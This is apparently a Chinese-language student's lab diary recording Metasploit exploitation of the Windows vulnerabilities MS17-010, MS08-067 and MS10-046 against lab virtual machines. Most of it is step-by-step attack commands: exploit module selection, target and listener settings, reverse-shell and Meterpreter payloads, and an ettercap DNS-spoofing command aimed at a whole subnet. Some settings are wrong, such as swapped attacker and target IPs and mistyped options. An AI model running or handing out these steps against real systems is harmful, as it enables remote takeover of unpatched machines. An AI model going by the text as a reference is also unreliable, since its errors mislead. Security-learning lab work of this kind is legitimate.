2020年1月7日
好了,到了第二天,早上起来的时候心情就是那么的激动
为什么呢,昨天熬夜到3点,终于吧环境搞好了,哎,我太难了!
今天一天主要做的事情是利用kali进行漏洞利用,具体利用过程和步骤如下:
ms17-010,ms08-067,ms10-046漏洞利用
一. ms17-010
1.漏洞成因:当 Microsoft 服务器消息块 1.0 (SMBv1) 服务器处理某些请求时,存在多个远程执行代码 漏洞。成功利用这些漏洞的攻击者可以获取在目标系统上执行代码的能力。为了利用此漏洞,在多数情况下,未经身份验证的攻击者可能向目标 SMBv1 服务器发送经特殊设计的数据包。
2.实验环境
攻击机:Kali
IP:192.168.65.133
靶机:Windows 7 x64
IP:192.168.65.132
3.实验步骤
启动metasploit
Msfconsole
查看kali IP
Ifconfig
查看靶机 IP
Ipconfig
搜索ms17-010
Search ms17-010
找到ms17-010攻击模块
Use 模块名
设置靶机IP地址
Set rhost 192.168.65.133
设置本地IP地址
set lhost 192.168.65.132
设置靶机端口
Set rport 445
设置payload(攻击载荷)
Set payload windows/x64/meterpreter/reverse_tcp
攻击
run
显示meterpreter>则表示攻击成功
二. ms10-046
1.漏洞成因:Windows支持使用快捷方式或LNK文件,LNK文件时指向本地文件的引用,点击LNK文件 与点击快捷方式所制定的目标具有相同效果。Windows没有正确处理LNK文件,特制的LNK文件可能导致Windows自动执行快捷方式文件所指定的代码。这些代码可能位于USB驱动、本地或者远程文件系统,光驱或者 其他位置,使用资源管理器查看了LNK文件所在的文字就足以触发这个漏洞。
2.实验环境
攻击机:Kali
IP:192.168.65.133
靶机:Windows xp
IP:192.168.65.134
3.实验步骤
启动metasploit
Msfconsole
查看kali IP
Ifconfig
查看靶机 IP
Ipconfig
搜索ms10-046
Search ms10-046
找到ms10-046攻击模块
Use 模块名
设置靶机IP地址
Set rhost 192.168.65.134
设置本地IP地址
set lhost i192.168.65.133
设置本机监听ip地址
set hrvhost 192.168.65.133
设置靶机端口
Set rport 445
设置payload(攻击载荷)
Set payload windows/shell/reverse_tcp
攻击
run
开启ettercap劫持整个网段
ettercap -T -q -i eth0 -P dns_spoof
三. ms08-067
1.漏洞成因: Windows的Server服务在处理特质RPC请求时存在缓冲区溢出漏洞,远程攻击者可以通过 发送恶意的RPC请求触发这个溢出,导致完全入侵用户系统,SYSTEM权限执行任意指令。
2.实验环境
攻击机:Kali
IP:192.168.65.133
靶机:Windows xp
IP:192.168.65.134
3.实验步骤
启动metasploit
Msfconsole
查看kali IP
Ifconfig
查看靶机 IP
Ipconfig
搜索ms08-067
Search ms08-067
找到ms08-067攻击模块
Use 模块名
设置靶机IP地址
Set rhost 192.168.65.134
设置本地IP地址
set lhost 192.168.65.133
设置靶机端口
Set rport 445
设置payload(攻击载荷)
Set payload windows/meterpreter/reverse_tcp
攻击
run
进入shell
shell
成功利用